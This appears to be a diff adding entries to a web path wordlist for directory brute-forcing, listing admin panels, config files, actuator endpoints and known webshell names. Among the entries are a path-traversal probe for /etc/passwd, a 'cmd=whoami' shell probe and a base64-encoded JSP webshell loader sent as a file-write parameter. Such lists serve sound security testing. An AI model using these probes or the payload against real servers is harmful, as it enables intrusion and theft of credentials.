8df56930f13d77c5886e34ca6511c12ae6660d9a.jsp 8e67a916b31b0a1c1bfc4e6a7ad0e575f2fa9e52.jsp 8fd343db0442136e693e745d7af1018a99b042af.jsp +9 9.php +90 9030e20f07484639377143f4b23e2bcb11bbab8d.jsp 906beecbef0928fbe38e1d9d100e9b02ef8e73fe.jsp 90ee7f3c291f78fbab6414fd7e2545f4a5eabf4f.jsp +91 911244498eb6805634d83261e7a1391cff40fa06.jsp +911admin 919b109751aa79f0dd2aecb1d7d23e58d9544543.jsp 91cf96c983ad2efaca225a1050e1607f3e7c5e03.jsp +92 9230e8c1c6dad3db204afacd3b36176d2da31165.jsp +93 93e42d381b31fd1d57de2e541cf68b7c75bff94e.jsp +94 94ab67132ee34b6423c3141938a54fb7ed4a951e.jsp 94d1aaabde8ff9b4b8f394dc68caebf981c86587.jsp +95 954f2e099e6c7dec5d14957372c2950cc00b3580.jsp 958ffda1155a5fc1b0970faac8f7dde2a6e30e49.jsp 95zzz.jspx +96 960a8918fd121a3976109f77e3eba4e5b955505f.jsp 9678.php +97 +98 9845d43612a8f384ade74af23dcc4e9e94f7de6a.jspx +99 99c8babf50402275b1e92a29b6c8e83d51fb1456.jsp 9a3b1b82d9d9ce4f25a54794df07ca005bee12bb.jsp 9a7309e40f3173d1c96144fa3ded4b58ebcb0c90.jsp @@ -2173,23 +3097,103 @@ 9e32b877-e01d-4948-80e9-8e65151ca2b6.jsp 9e39dcf1673ae2b496cad98dc10f64a22cb0a1f9.jsp 9f1df0249a6a491cdd5df598d83307338daa4c43.jsp +;/admin +;/json +;/login +;admin/ +;json/ +;login/ +@ +A +ADMIN +ADMIN.%EXT% +ADSearch.cc?methodToCall=search AKLvlT.jsp ASALocalRun/ +ASPSamp/AdvWorks/equipment/catalog_type.asp AT-admin.cgi +About +AboutUs +AccessDenied.%EXT% +AccessPlatform/ +AccessPlatform/auth/ +AccessPlatform/auth/clientscripts/ +AccessPlatform/auth/clientscripts/cookies.js +AccessPlatform/auth/clientscripts/login.js +ActiveDirectoryRemoteAdminScripts/ +AdaptCMS/admin.php?view=/&view=levels +AdaptCMS/admin.php?view=/&view=settings +AdaptCMS/admin.php?view=/&view=stats +AddressBookJ2WB +AddressBookJ2WE/services/AddressBook +AddressBookJ2WE/services/AddressBook/wsdl/ +AddressBookW2JB +AddressBookW2JE/services/AddressBook +AddressBookW2JE/services/AddressBook/wsdl/ +Admin +Admin.%EXT% +Admin/ +Admin/knowledge/dsmgr/users/GroupManager.asp +Admin/knowledge/dsmgr/users/UserManager.asp +Admin/login/ +Admin;/ +AdminCaptureRootCA +AdminClients +AdminConnections +AdminEvents +AdminJDBC +AdminLicense +AdminMain +AdminProps +AdminRealm +AdminThreads AdminTools/ +AdminVersion +AdvWorks/equipment/catalog_type.asp +AirWatch/Login Ajax.jsp?Ppwd=nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA +AlbumCatalogWeb +AlbumCatalogWeb/ +AlbumCatalogWeb/docs/ +AlbumCatalogWeb/docsservlet +AlbumCatalogWeb/docsservlet/ +AlbumCatalogWebservlet +AlbumCatalogWebservlet/ Alert.jsp?Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk=1 +AppInstallStatusServlet +AppManagementStatus AppPackages/ +AppServer +App_Code +App_Data +ApplicationProfileSample +ApplicationProfileSample/ +ApplicationProfileSample/docs/ +ApplicationProfileSampleservlet +ApplicationProfileSampleservlet/ Aptfile +Articles.%EXT% AutoTest.Net/ +BBApp BackerHack JSP Manage-System 1.0.jsp BackerHack JSP Manage-System 1.0.jsp~ Backup/ +BackupConfig.php +Bank/ +Bank/services/Transfer_SEI +Bank/services/Transfer_SEI/wsdl +BeenThere BenchmarkDotNet.Artifacts/ Berksfile +BigDump/ +Bigdump.%EXT% Binaries/ +BingSiteAuth.xml +BizTalkServer +Black.%EXT% Black.php BmODCKTQ.jsp +Bootstrap Brocfile.coffee Brocfile.js Browser.jsp @@ -2197,15 +3201,21 @@ Build Build.bat BundleArtifacts/ CATKIN_IGNORE +CFIDE CFIDE/ +CFIDE/Administrator/ +CFIDE/Administrator/startstop.html CFIDE/administrator/ +CFIDE/scripts/ajax/FCKeditor CHANGELOG CHANGELOG.HTML CHANGELOG.MD CHANGELOG.TXT CHANGELOG.html +CHANGELOG.log CHANGELOG.md CHANGELOG.txt +CHANGES CHANGES.html CHANGES.md CMakeCache.txt @@ -2213,10 +3223,14 @@ CMakeFiles CMakeLists.txt CMakeLists.txt.user CMakeScripts +CONNECT CONTRIBUTING.md COPYING COPYRIGHT.txt +COadmin CREDITS +CTCWebService/CTCWebServiceBean +CTCWebService/CTCWebServiceBean?wsdl CTestTestfile.cmake CVS/ CVS/Entries @@ -2226,6 +3240,7 @@ Cakefile Capfile Cargo.lock Carthage/Build +CgiStart?page=Single Cgishell.pl ChangeLog ChangeLog.html @@ -2237,25 +3252,37 @@ Changelog.md Changelog.txt Cheffile Citrix/ +Citrix//AccessPlatform/auth/clientscripts/cookies.js +Citrix/AccessPlatform/auth/clientscripts/login.js Citrix/PNAgent/config.xml +Classpath/ ClientAccessPolicy.xml ClientBin/ +ClusterRollout Command Execution (win32).jsp Command Execution (win32).jsp~ Config/ Configs/Current/authServerSettings.config Configs/authServerSettings.config +Connections +ConsoleHelp +ConsoleHelp/ ConsoleHelp/login.jsp +ControllerServlet +CookieExample Cpanel.php CryptCore.jsp Customize.jsp DB DEADJOE +DELETE Database_Administration/ Database_Backup/ +DateServlet Db.properties Db.script Debug.jsp +DefaultWebApp Delete.jsp DerivedData/ DerivedDataCache/ @@ -2264,10 +3291,26 @@ DocProject/Help/Html2 DocProject/Help/html DocProject/buildhelp/ Dockerfile +Dockerrun.aws.json Docs.jsp +Documentation.html +DynaCacheESI +DynaCacheESI/esiInavlidator +DynamicQuery/EmployeeFinder ENV/ +EWbutton_Community +EWbutton_GuestBook EemAdminService/EemAdmin?wsdl +ErrorPage.htm +ErrorReporter +ErrorServlet +Estadisticas/ +EuropeMirror +Exadmin/ ExceptionThrown.jsp +ExchWeb/ +Exchange +Exchange/ ExportedObj/ FAQ FCKeditor @@ -2284,17 +3327,37 @@ FCKeditor22/ FCKeditor23/ FCKeditor24/ FakesAssemblies/ +FileHandler.%EXT% +FileHandler/ +FileTransfer +FileZilla.xml Files/Docs/docs.checksum Files/binder.autosave Files/binder.backup Files/search.indexes Files/user.lock +FireFox_Reco +FirmConnect.%EXT% Fw.jsp Fw.jsp?f=x.jsp&t=PCVAcGFnZSBpbXBvcnQ9ImphdmF4LnhtbC5iaW5kLiosamF2YS5sYW5nLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIge1UoQ2xhc3NMb2FkZXIgYykge3N1cGVyKGMpO31wdWJsaWMgQ2xhc3MgZyhieXRlW10gYikge3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLCAwLCBiLmxlbmd0aCk7fX0lPjwlIFN0cmluZyBjID0gKFN0cmluZykgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImMiKTtpZiAobnVsbCA9PSBjICYmIG51bGwgIT0gc2Vzc2lvbiljPShTdHJpbmcpc2Vzc2lvbi5nZXRBdHRyaWJ1dGUoImMiKTtpZiAobnVsbCA9PSBjICYmIG51bGwgIT0gYXBwbGljYXRpb24uZ2V0QXR0cmlidXRlKCJfY18iKSljPShTdHJpbmcpYXBwbGljYXRpb24uZ2V0QXR0cmlidXRlKCJfY18iKTtpZiAobnVsbCAhPSBjKXRyeSB7YXBwbGljYXRpb24uc2V0QXR0cmlidXRlKCJfY18iLGMpO25ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKERhdGF0eXBlQ29udmVydGVyLnBhcnNlQmFzZTY0QmluYXJ5KGMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7fSBjYXRjaCAoRXhjZXB0aW9uIGUpIHt9JT4= GEMINI/ +GET +GalleryMenu Gemfile Gemfile.lock Generated_Code/ +Greenhouse +Greenhouse/ +GreenhouseByWebSphere/docs/ +GreenhouseEJB/ +GreenhouseEJB/services/GreenhouseFront +GreenhouseEJB/services/GreenhouseFront/wsdl/ +GreenhouseWeb +GreenhouseWeb/ +GreenhouseWebservlet +GreenhouseWebservlet/ +Greenhouseservlet +Greenhouseservlet/ GruntFile.coffee Gruntfile.coffee Gruntfile.js @@ -2303,22 +3366,35 @@ Gulpfile Gulpfile.coffee Gulpfile.js GwmcLov.jsp +HEAD +HFM/Administration/ HISTORY HISTORY.txt HNAP1/ +HTTPClntClose +HTTPClntLogin +HTTPClntRecv +HTTPClntSend Hello.jsp HelloHTML.jsp HelloHTMLError.jsp +HelloPervasive HelloVXML.jsp HelloVXMLError.jsp HelloWML.jsp HelloWMLError.jsp HelloWorld.jsp +HelloWorldServlet HitCount.jsp Homestead.json Homestead.yaml Http/ Http/DataLayCfg.xml +HyperGraphQL +IBMDefaultErrorReporter +IBMWebAS +IMS +INF/maven/com.atlassian.jira/atlassian INSTALL INSTALL.HTML INSTALL.MD @@ -2333,22 +3409,29 @@ INSTALL.txt INSTALL_admin IXRbE.jsp IXRbE02.jsp +IdentityGuardSelfService/ +IdentityGuardSelfService/images/favicon.ico Indy_admin/ Install Install.html Install.md Install.txt +Install_dotCMS_Release.txt InstalledFiles Intermediate/ JFolder.jsp JFolder.jsp~ JFoler 1.0.jsp JFoler 1.0.jsp~ +JNLP-INF/APPLICATION.JNLP JSP Backdoor Reverse Shell.jsp JSP Shell 岁月联盟专用版本.jsp JSP Shell 岁月联盟专用版本.jsp~ JSP一句话、已测试.jsp JSP菜刀一句话木马.jsp +JTAExtensionsSamples/TransactionTracker +JTAExtensionsSamples/TransactionTracker/ +JTAExtensionsSamples/docs/ Jakefile Java Shell.jsp Jenkinsfile @@ -2386,41 +3469,93 @@ LICENSE LICENSE.md LICENSE.txt LiveUser_Admin/ +LogfileSearch +LogfileTail +Logfiles/ +LoginForm Logs/ Lotus_Domino_Admin/ MAINTAINERS.txt MANIFEST MANIFEST.MF MANIFEST.bak +META-INF META-INF/ +META-INF/CERT.SF +META-INF/MANIFEST.MF +META-INF/SOFTWARE.SF +META-INF/app-config.xml +META-INF/application-client.xml +META-INF/application.xml +META-INF/beans.xml +META-INF/container.xml META-INF/context.xml +META-INF/eclipse.inf +META-INF/ejb-jar.xml +META-INF/ironjacamar.xml +META-INF/jboss-app.xml +META-INF/jboss-client.xml +META-INF/jboss-deployment-structure.xml +META-INF/jboss-ejb-client.xml +META-INF/jboss-ejb3.xml +META-INF/jboss-webservices.xml +META-INF/jbosscmp-jdbc.xml +META-INF/openwebbeans/openwebbeans.properties +META-INF/persistence.xml +META-INF/ra.xml +META-INF/spring/application-context.xml +META-INF/weblogic-application.xml +META-INF/weblogic-ejb-jar.xml META.json META.yml +MMWIP MP_verify_tPg2TnCah9Al81Ej.txt +MRTG/ Mail/smtp/Admin/smadv.asp Makefile Makefile.in Makefile.old Mercury.modules Mercury/ +MessageDrivenBeans/docs/ +MessageDrivenBeans/docsservlet/ +MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https +MicroStrategyWS/happyaxis.jsp +Microsoft-Server-ActiveSync/ +Micros~1/ Mkfile.old ModifyRegistryTp.jsp Module.symvers MyAdmin/ MyAdmin/scripts/setup.php +MySQLAdmin +MySQLadmin Mysql Database.jsp Mysql Database.jsp~ New%20Folder New%20folder%20(2) +OA_HTML/OA.jsp +OMA/ +OPTIONS OWA/ Office/ Office/graph.php +Office/graph.php#xxe OpenCover/ Oracle Database.jsp Oracle Database.jsp~ +OrderProcessorEJB/ +OrderProcessorEJB/services/FrontGate +OrderProcessorEJB/services/FrontGate/wsdl/ +Orion/Login.aspx +PATCH +PDC/ajaxreq.php?PARAM=127.0.0.1+ +PKG-INFO +PMA PMA/ PMA/index.php PMA2/index.php +PMA2005 PMA2005/ PMA2009/ PMA2011/ @@ -2431,17 +3566,28 @@ PMA2015/ PMA2016/ PMA2017/ PMA2018/ +PMUser/ +POST +PRTG/index.htm PSUser/ +PUT Package.StoreAssociation.xml +Passwd_Files/ Password PharoDebug.log Ping.jsp +PlantsByWebSphere +PlantsByWebSphere/docs +Polls_admin +Privacy.html ProcessBuilder-cmd.jsp ProcessBuilder-reflect-cmd.jsp Procfile Procfile.dev Procfile.offline +Public/ PublishScripts/ +QUERYHIT.HTM QuickLook/ README README.HTML @@ -2452,7 +3598,9 @@ README.html README.md README.mkd README.txt +README_VELOCE RELEASE_NOTES.txt +RLcQq ROOTtows.jsp Rakefile Read @@ -2466,6 +3614,13 @@ Readme Readme.html Readme.md Readme.txt +RecoverPassword +Remote-Access/ +Remote-Administrator/ +Remote_Execution/ +ReportServer/Pages/ReportViewer.aspx +Reports/Pages/Folder.aspx +RequestParamExample RootCA.crt Runtime-reflect-cmd.jsp RushSite.xml @@ -2473,27 +3628,60 @@ SJavaWebManageV1.4.jsp SJavaWebManageV1.4.jsp~ SJavaWebManageV1.4.jsp~1 SQLyogTunnel.php +STATUS.txt SVN/ +SamplesGallery +SaveForLater.%EXT% Saved/ +Search +Searchadminbox.%EXT% Secret/ +Security/login/ Server +Server.%EXT% Server.php Server/ ServerAdministrator/ ServerList.cfg ServerList.xml ServiceFabricBackup/ +SessionExample +SessionServlet Settings/ui.plist Sh3ll.php Silic Group.jsp Silic Group.jsp~ Silic.jsp +SimpappServlet +SimpleServlet +Site.admin +SiteServer/Admin +SiteServer/Admin/commerce/foundation/DSN.asp +SiteServer/Admin/commerce/foundation/driver.asp +SiteServer/Admin/knowledge/dsmgr/default.asp +SiteServer/admin/findvserver.asp +Sites/Knowledge/Membership/Inspired/ViewCode.asp +Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp +Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp +Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp +Sites/Samples/Knowledge/Push/ViewCode.asp +Sites/Samples/Knowledge/Search/ViewCode.asp +Smarty-2.6.3 +SnoopServlet SourceArt/ +SourceCodeViewer +Sourceservlet-classViewer SqueakDebug.log +Statistik/ +StockQuote/ +StockQuote/services/xmltoday-delayed-quotes +StockQuote/services/xmltoday-delayed-quotes/wsdl/ +StockServlet StreamingStatistics StyleCopReport.xml Super-Admin/ Sym.php +Symlink.%EXT% Symlink.php Symlink.pl SypexDumper_2011/ @@ -2501,11 +3689,58 @@ SysAdmin/ SysAdmin2/ SystemErr.log SystemOut.log +T3AdminMain TEMP/ TMP TODO +TRACE +Taxonomy_admin +TechnologySamples/AddressBook +TechnologySamples/AddressBook/ +TechnologySamples/AddressBook/AddressBookServlet +TechnologySamples/AddressBook/servlet/ +TechnologySamples/BasicCalculator +TechnologySamples/BasicCalculator/ +TechnologySamples/BulletinBoard +TechnologySamples/BulletinBoard/ +TechnologySamples/BulletinBoardservlet +TechnologySamples/Calendar +TechnologySamples/Calendar/ +TechnologySamples/FilterServlet +TechnologySamples/FormLogin +TechnologySamples/FormLogin/ +TechnologySamples/FormLoginservlet +TechnologySamples/FormLoginservlet/ +TechnologySamples/JAASLogin +TechnologySamples/JAASLogin/ +TechnologySamples/JAASLoginservlet +TechnologySamples/JAASLoginservlet/ +TechnologySamples/MovieReview +TechnologySamples/MovieReview/ +TechnologySamples/MovieReview2_0/ +TechnologySamples/MovieReview2_1/ +TechnologySamples/PageReturner +TechnologySamples/PageReturner/ +TechnologySamples/PageReturnerservlet +TechnologySamples/PageReturnerservlet/ +TechnologySamples/ReadingList +TechnologySamples/ReadingList/ +TechnologySamples/SimpleJSP +TechnologySamples/SimpleJSP/ +TechnologySamples/SimpleServlet +TechnologySamples/SimpleServlet/ +TechnologySamples/Subscription +TechnologySamples/Subscription/ +TechnologySamples/Subscriptionservlet +TechnologySamples/Subscriptionservlet/ +TechnologySamples/Taglib +TechnologySamples/Taglib/ +TechnologySamples/docs +Telerik.Web.UI.DialogHandler.aspx +Telerik.Web.UI.WebResource.axd?type=rau TestResult.xml Testing +ThankYou.%EXT% Thorfile Thumbs.db Trace.axd @@ -2513,35 +3748,224 @@ Trace.axd::$DATA UPDATE.txt UPGRADE UPGRADE.txt +UPGRADE_README.txt UknowThis.jsp UknowThis.jsp?cmd=whoami +UniversityServlet +Updates.txt UpgradeLog.XML Upload UserFile UserFiles UserLogin/ +VERSION.md VERSION.txt +VERSIONS.html +VERSIONS.md +VERSIONS.txt Vagrantfile Vagrantfile.backup ValidationError.jsp +Version.%EXT% +VirtualEms/Login.aspx +WEB-INF WEB-INF./ WEB-INF./web.xml WEB-INF/ +WEB-INF/application-client.xml +WEB-INF/applicationContext.xml +WEB-INF/application_config.xml +WEB-INF/beans.xml +WEB-INF/cas-servlet.xml +WEB-INF/cas.properties +WEB-INF/classes/META-INF/app-config.xml +WEB-INF/classes/META-INF/persistence.xml +WEB-INF/classes/app-config.xml +WEB-INF/classes/application.properties +WEB-INF/classes/application.yml +WEB-INF/classes/applicationContext.xml +WEB-INF/classes/cas-theme-default.properties +WEB-INF/classes/commons-logging.properties +WEB-INF/classes/config.properties +WEB-INF/classes/countries.properties +WEB-INF/classes/db.properties +WEB-INF/classes/default-theme.properties +WEB-INF/classes/default_views.properties +WEB-INF/classes/demo.xml +WEB-INF/classes/faces-config.xml +WEB-INF/classes/fckeditor.properties +WEB-INF/classes/hibernate.cfg.xml +WEB-INF/classes/languages.xml +WEB-INF/classes/log4j.properties +WEB-INF/classes/log4j.xml +WEB-INF/classes/logback.xml +WEB-INF/classes/messages.properties +WEB-INF/classes/mobile.xml +WEB-INF/classes/persistence.xml +WEB-INF/classes/protocol_views.properties +WEB-INF/classes/resources/config.properties +WEB-INF/classes/services.properties +WEB-INF/classes/struts-default.vm +WEB-INF/classes/struts.properties +WEB-INF/classes/struts.xml +WEB-INF/classes/theme.properties +WEB-INF/classes/validation.properties +WEB-INF/classes/velocity.properties +WEB-INF/classes/web.xml +WEB-INF/components.xml +WEB-INF/conf/caches.dat +WEB-INF/conf/caches.properties +WEB-INF/conf/config.properties +WEB-INF/conf/core.xml +WEB-INF/conf/core_context.xml +WEB-INF/conf/daemons.properties +WEB-INF/conf/db.properties +WEB-INF/conf/editors.properties +WEB-INF/conf/jpa_context.xml +WEB-INF/conf/jtidy.properties +WEB-INF/conf/lutece.properties +WEB-INF/conf/mime.types +WEB-INF/conf/page_navigator.xml +WEB-INF/conf/search.properties +WEB-INF/conf/webmaster.properties +WEB-INF/conf/wml.properties WEB-INF/config.xml +WEB-INF/config/dashboard-statistics.xml +WEB-INF/config/faces-config.xml +WEB-INF/config/metadata.xml +WEB-INF/config/mua-endpoints.xml +WEB-INF/config/security.xml +WEB-INF/config/soapConfig.xml +WEB-INF/config/users.xml +WEB-INF/config/web-core.xml +WEB-INF/config/webflow-config.xml +WEB-INF/config/webmvc-config.xml +WEB-INF/decorators.xml +WEB-INF/deployerConfigContext.xml +WEB-INF/dispatcher-servlet.xml +WEB-INF/ejb-jar.xml +WEB-INF/faces-config.xml +WEB-INF/geronimo-web.xml +WEB-INF/glassfish-resources.xml +WEB-INF/glassfish-web.xml +WEB-INF/hibernate.cfg.xml +WEB-INF/ias-web.xml +WEB-INF/ibm-web-bnd.xmi +WEB-INF/ibm-web-ext.xmi +WEB-INF/jax-ws-catalog.xml +WEB-INF/jboss-client.xml +WEB-INF/jboss-deployment-structure.xml +WEB-INF/jboss-ejb-client.xml +WEB-INF/jboss-ejb3.xml +WEB-INF/jboss-web.xml +WEB-INF/jboss-webservices.xml +WEB-INF/jetty-env.xml +WEB-INF/jetty-web.xml +WEB-INF/jonas-web.xml +WEB-INF/jrun-web.xml +WEB-INF/liferay-display.xml +WEB-INF/liferay-layout-templates.xml +WEB-INF/liferay-look-and-feel.xml +WEB-INF/liferay-plugin-package.xml +WEB-INF/liferay-portlet.xml +WEB-INF/local-jps.properties +WEB-INF/local.xml +WEB-INF/logback.xml +WEB-INF/logs/log.log +WEB-INF/openx-config.xml +WEB-INF/portlet-custom.xml +WEB-INF/portlet.xml +WEB-INF/quartz-properties.xml +WEB-INF/remoting-servlet.xml +WEB-INF/resin-web.xml +WEB-INF/resources/config.properties +WEB-INF/restlet-servlet.xml +WEB-INF/rexip-web.xml +WEB-INF/service.xsd +WEB-INF/sitemesh.xml +WEB-INF/spring-config.xml +WEB-INF/spring-config/application-context.xml +WEB-INF/spring-config/authorization-config.xml +WEB-INF/spring-config/management-config.xml +WEB-INF/spring-config/messaging-config.xml +WEB-INF/spring-config/presentation-config.xml +WEB-INF/spring-config/services-config.xml +WEB-INF/spring-config/services-remote-config.xml +WEB-INF/spring-configuration/filters.xml +WEB-INF/spring-context.xml +WEB-INF/spring-dispatcher-servlet.xml +WEB-INF/spring-mvc.xml +WEB-INF/spring-ws-servlet.xml +WEB-INF/spring/webmvc-config.xml +WEB-INF/springweb-servlet.xml +WEB-INF/struts-config-ext.xml +WEB-INF/struts-config-widgets.xml +WEB-INF/struts-config.xml +WEB-INF/sun-jaxws.xml +WEB-INF/sun-web.xml +WEB-INF/tiles-defs.xml +WEB-INF/tjc-web.xml +WEB-INF/trinidad-config.xml +WEB-INF/urlrewrite.xml +WEB-INF/validation.xml +WEB-INF/validator-rules.xml +WEB-INF/web-borland.xml +WEB-INF/web-jetty.xml WEB-INF/web.xml +WEB-INF/web.xml.jsf +WEB-INF/web2.xml +WEB-INF/weblogic.xml +WEB-INF/workflow-properties.xml +WLDummyInitJVMIDs WLUpdate.jsp WSO.php +WS_FTP WS_FTP.LOG +WS_FTP.log WS_FTP/ WS_FTP/Sites/ws_ftp.ini +WSsamples WSsamples/index.jsp +WarehouseEJB/ +WarehouseEJB/services/WarehouseFront +WarehouseEJB/services/WarehouseFront/wsdl/ +WarehouseWeb +WarehouseWeb/ +WarehouseWebservlet +WarehouseWebservlet/ +WebResource.axd?d=LER8t9aS +WebService +WebServiceServlet +WebServicesSamples/docs/ +WebSer~1 +WebShell.cgi +WebSphere +WebSphereBank +WebSphereBank/ +WebSphereBank/docs/ +WebSphereBankDeposit +WebSphereBankDeposit/ +WebSphereBankDepositservlet +WebSphereBankDepositservlet/ +WebSphereBankservlet +WebSphereBankservlet/ +WebSphereSamples +WebSphereSamples.Configuration.config +WebSphereSamples/ +WebSphereSamples/SingleSamples/AccountAndTransfer/create.html +WebSphereSamples/SingleSamples/Increment/increment.html +WebSphereSamples/YourCo/main.html +Webalizer/ Wisdom.jsp +Wishlist.%EXT% +Wordpress/ X11.jsp X3*.jsp X3_verify*.jsp X3_verify_mIjyqEnm7D1D_tyJ0FN3rw.jsp X3_verify_mIjyqEnm7D1D_tyJ0FN3rw.jsp.jsp X9.jsp +XSQLConfig.xml XXOO.jsp XXOO.jsp~ XZimbra.jsp?f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs=1 @@ -2550,12 +3974,17 @@ Xtunnel.jsp YeRUWDmE.jsp ZombieBoy.jsp \..\..\..\..\..\..\..\..\..\etc\passwd +_ _*.jsp _.htpasswd _.jsp _.t.jsp _46_sjn4gwl3l191.jsp +_AuthChangeUrl? _Dockerfile +_DynaCacheEsi +_DynaCacheEsi/ +_DynaCacheEsi/esiInvalidator _LPHPMYADMIN/ _Pvt_Extensions _SQL @@ -2569,33 +3998,63 @@ __bx_log.log __cache/ __dummy.html __history/ +__index.%EXT% __index.php __init__.py __main__.py __pma___ +__pycache__ __pycache__/ __recovery/ __test.php __xs1pwn_.jsp _adm _admin +_admin.html +_admin/ +_admin_ +_admincp +_administracion +_administration +_awstats/ +_baks +_baks.%EXT% _book +_borders/ _build _build/ _cache/ +_cat/health +_cat/indices +_cluster/health +_cm_admin _com.jsp _common.xsl _config.inc _data/ _data/error_log +_dbadmin _debugbar/open +_docs.en/readme.txt _errors _eumm/ _files +_fpclass +_fpclass/ _fragment +_funcion/ +_funciones/ +_function/ +_functions/ _goOk.jsp _h5ai/ +_ignition/execute-solution +_inc/ _include +_include/ +_includes/ +_index +_index.%EXT% _index.php _install _internal @@ -2620,39 +4079,88 @@ _logs/err.log _logs/error-log _logs/error.log _logs/error_log +_mem_bin/ +_mem_bin/autoconfig.asp +_mem_bin/formslogin.asp +_mm _mmServerScripts/ _mmServerScripts/MMHTTPDB.asp _mmServerScripts/MMHTTPDB.php +_myadmin +_myadmin.%EXT% +_news_admin_ +_notes _notes/ _notes/dwsync.xml _novo/ _novo/composer.lock _old _pages +_phpmyadmin _phpmyadmin/ _pkginfo.txt +_ppadmin +_priv8/ +_privado/ +_privados/ _private +_private/ +_profiler _proxy _site/ +_siteadmin _sjn4gwl3l191.jsp _source _sqladm _src +_superadmin +_temp/ _test +_tests +_themes/ _thumbs/ +_tmp_war +_tmp_war_DefaultWebApp _tracks +_vti_adm +_vti_adm/ +_vti_admin +_vti_aut +_vti_aut/ +_vti_bin _vti_bin/ _vti_bin/_vti_adm/admin.dll _vti_bin/_vti_aut/author.dll +_vti_bin/_vti_aut/dvwssr.dll +_vti_bin/_vti_aut/fp30reg.dll _vti_bin/shtml.dll +_vti_bin/shtml.exe?_vti_rpc +_vti_cnf +_vti_cnf/ +_vti_inf.html +_vti_info.html +_vti_log +_vti_log/ +_vti_pvt _vti_pvt/ +_vti_pvt/administrator.pwd +_vti_pvt/administrators.pwd +_vti_pvt/authors.pwd +_vti_pvt/service.pwd _vti_pvt/service.pwt +_vti_pvt/shtml.exe +_vti_pvt/users.pwd _vti_pvt/users.pwt +_vti_script +_vti_txt +_vti_txt/ +_webalizer/ _wpeprivate _wpeprivate/ _wpeprivate/config.json _www _yardoc/ +a a%5c.aspx a.jsp a.jspx @@ -2660,71 +4168,303 @@ a.out a04003c2dfca3bdd0ebf1a641e49cce34b4b1b5d.jsp a20dcd6bfafb313da2ed9e8bf006b0cf6026084c.jspx a2951b681435c42a5d89bdc7606042f821b134ef.jsp +a2e2gp2r2/x.jsp +a4j/g/3_3_1.GAorg.richfaces.renderkit.html.Paint2DResource/DATA/ +a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/ +a4j/s/3_3_3.Finalorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/ a65a0e13d5a1a404366f6bfd92e5dde6e94a6ba6.jsp +a_gauche +aa aa62348ad603bd54abdda7a419b13eebb8cc2a42.jsp +aaa aaa.jsp?pass=1 aaaaaaaaaa.jsp aaajsp.jsp aab2003aabc5893ecb63edef66297089c59d88fc.jsp +aadmin aadmin/ aaee794b7c8b091313325da6082cd2d361e400f6.jspx +ab/ +ab/docs/ ab52ce045d029a36b38aac98c497f4cd2371acd1.jspx +abc abc.jsp +abc123 +abcd +abcd1234 +about +about-us +about.%EXT% +about_us +aboutus +aboutus.%EXT% abs/ +abstract +abstract.%EXT% +abstractsadmin +abuse +abuse.%EXT% +ac ac91e5b9b9dcd373eaa9360a51aa661481ab9429.jsp +academic +academic.%EXT% +academics +acatalog acceptance_config.yml +acces acceso +acceso.%EXT% acceso.php access access-log access-log.1 +access-log/ +access.%EXT% access.1 access.log access.php access.txt access/ +access/config access_.log +access_admin.%EXT% +access_db access_log access_log.1 +access_logs/ +accessgranted +accessibility accesslog +accesslog/ +accessories +accommodation +account +account.%EXT% account.html account.php +account/ +account/login +account/login.%EXT% +account/login.htm +account/login.html +account/login.jsp +account/login.py +account/login.rb +account/login.shtml +account/logon +account/signin +account_edit +account_edit.%EXT% +account_history +account_history.%EXT% +accountants +accounting accounts +accounts.%EXT% +accounts.cgi +accounts.htm +accounts.html +accounts.jsp accounts.php +accounts.pl +accounts.py +accounts.rb accounts.sql accounts.txt accounts.xml accounts/ +accounts/login +accounts/login.%EXT% +accounts/login.htm +accounts/login.html +accounts/login.jsp +accounts/login.py +accounts/login.rb +accounts/login.shtml +accounts/logon +accounts/signin +accountsettings +acct_login acct_login/ +achats +acheter +acs-admin action.jsp +actions +actions/seomatic/meta +actions_admin +actions_admin.%EXT% +activate +activation.%EXT% activemq/ activity.log +activitysessions/docs/ actuator +actuator/;/auditLog +actuator/;/auditevents +actuator/;/beans +actuator/;/caches +actuator/;/conditions +actuator/;/configprops +actuator/;/configurationMetadata +actuator/;/dump +actuator/;/env +actuator/;/events +actuator/;/exportRegisteredServices +actuator/;/features +actuator/;/flyway +actuator/;/health +actuator/;/healthcheck +actuator/;/heapdump +actuator/;/httptrace +actuator/;/info +actuator/;/integrationgraph +actuator/;/jolokia +actuator/;/liquibase +actuator/;/logfile +actuator/;/loggers +actuator/;/loggingConfig +actuator/;/mappings +actuator/;/metrics +actuator/;/prometheus +actuator/;/refresh +actuator/;/registeredServices +actuator/;/releaseAttributes +actuator/;/resolveAttributes +actuator/;/scheduledtasks +actuator/;/sessions +actuator/;/shutdown +actuator/;/springWebflow +actuator/;/sso +actuator/;/ssoSessions +actuator/;/statistics +actuator/;/status +actuator/;/threaddump +actuator/;/trace +actuator/auditLog +actuator/auditevents +actuator/beans +actuator/caches +actuator/conditions +actuator/configprops +actuator/configurationMetadata actuator/dump actuator/env +actuator/events +actuator/exportRegisteredServices +actuator/features +actuator/flyway +actuator/gateway/routes +actuator/health +actuator/healthcheck +actuator/heapdump +actuator/httptrace +actuator/hystrix.stream +actuator/info +actuator/integrationgraph +actuator/jolokia +actuator/liquibase actuator/logfile +actuator/loggers +actuator/loggingConfig +actuator/management actuator/mappings +actuator/metrics +actuator/prometheus +actuator/refresh +actuator/registeredServices +actuator/releaseAttributes +actuator/resolveAttributes +actuator/scheduledtasks +actuator/sessions +actuator/shutdown +actuator/springWebflow +actuator/sso +actuator/ssoSessions +actuator/statistics +actuator/status +actuator/threaddump actuator/trace +actuators/ +actuators/dump +actuators/env +actuators/health +actuators/logfile +actuators/mappings 